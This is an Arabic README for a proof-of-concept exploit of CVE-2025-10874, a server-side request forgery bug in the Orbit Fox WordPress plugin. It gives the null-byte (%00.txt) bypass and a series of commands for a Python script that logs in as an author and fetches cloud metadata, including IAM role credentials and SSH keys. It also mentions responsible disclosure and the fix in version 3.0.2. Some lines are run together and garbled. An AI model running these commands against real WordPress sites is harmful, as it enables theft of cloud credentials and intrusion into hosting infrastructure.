
يُوضّح ثغرة SSRF عبر تجاوز حقن البايت الفارغ لـ CVE-2025-10874

إثبات مفهوم للاستغلال يوضح ثغرة تزوير الطلبات من جانب الخادم (SSRF) في إضافة Orbit Fox الخاصة بووردبريس مع تجاوز الحقن بالبايت الفارغ.
مقال تفصيلي: https://ryanmroth.com/articles/orbit-fox-ssrf
| التفاصيل | الملاحظات |
|---|
| معرف CVE: | CVE-2025-10874 |
| الإضافة المتأثرة: | Orbit Fox من ThemeIsle |
| نوع الثغرة: | تزوير الطلبات من جانب الخادم (SSRF) (CWE-918) |
| درجة CVSS: | 5.5 (متوسطة) |
| الصلاحيات المطلوبة: | مؤلف+ (دور المؤلف في ووردبريس أو أعلى) |
| الإصدار المُصلَح | 3.0.2+ |
تحتوي وظيفة استيراد MyStock في إضافة Orbit Fox على ثغرة SSRF تسمح للمستخدمين المصادق عليهم بصلاحيات مؤلف+ بإرسال طلبات HTTP عشوائية من خادم ووردبريس. توجد الثغرة في إجراء AJAX الخاص بـ handle-request-mystock-import، والذي يفشل في التحقق من معاملات URL وتنظيفها بشكل صحيح.
يستغل هذا الإثبات تجاوز الحقن بالبايت الفارغ (%00.txt) للالتفاف على التحقق من URL، مما يتيح الوصول إلى خدمات البيانات الوصفية الداخلية، وواجهات برمجة تطبيقات مزودي الخدمات السحابية، وموارد الشبكة الأخرى التي يمكن الوصول إليها من الخادم.
http://169.254.169.254/latest/meta-data/hostnamehttp://169.254.169.254/latest/meta-data/iam/security-credentials/http://169.254.169.254/latest/meta-data/public-keys/0/openssh-keyrequestsurllib3# استنساخ المستودع
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874
# تثبيت التبعيات (باستخدام uv)
uv sync
# أو باستخدام pip
pip install requests urllib3
# استخراج اسم مضيف مثيل AWS (الهدف الافتراضي)
python orbit_fox_poc.py http://target.com -u author -p password123
# تحديد URL مخصص لهدف SSRF
python orbit_fox_poc.py http://target.com -u author -p password123 \
-s http://169.254.169.254/latest/meta-data/hostname
# استخراج بيانات اعتماد دور IAM
python orbit_fox_poc.py http://target.com -u author -p password123 \
-s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# استخراج مفتاح SSH العام
python orbit_fox_poc.py http://target.com -u author -p password123 \
-s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
# اختبار بدون تجاوز البايت الفارغ (سيفشل على الإصدارات المُصلَحة)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte
# تفعيل مخرجات التصحيح لاستكشاف الأخطاء وإصلاحها
python orbit_fox_poc.py http://target.com -u author -p password123 --debug
positional arguments:
target عنوان URL المستهدف لووردبريس (مثال: http://example.com)
required arguments:
-u, --username اسم مستخدم ووردبريس (مطلوب دور مؤلف+)
-p, --password كلمة مرور ووردبريس
optional arguments:
-h, --help عرض رسالة المساعدة والخروج
-s, --ssrf-url عنوان URL المطلوب عبر SSRF
(الافتراضي: http://169.254.169.254/latest/meta-data/hostname)
--no-nullbyte تعطيل تجاوز البايت الفارغ (اختبار SSRF الأساسي فقط)
--debug تفعيل مخرجات التصحيح لاستكشاف الأخطاء وإصلاحها
%00.txt بعنوان URL الهدف لتجاوز التحققhandle-request-mystock-importadmin-ajax.php مع إجراء handle-request-mystock-importتم الإفصاح عن هذه الثغرة بشكل مسؤول للبائع وتم إصلاحها في إصدار Orbit Fox 3.0.2. يُقدم إثبات المفهوم هذا للأغراض التالية:
لأغراض الاختبار الأمني المصرح به فقط
تُقدم هذه الأداة للأغراض التعليمية والاختبار الأمني المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. يجب على المستخدمين:
لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذه الأداة.
آخر تحديث: 2025-10-06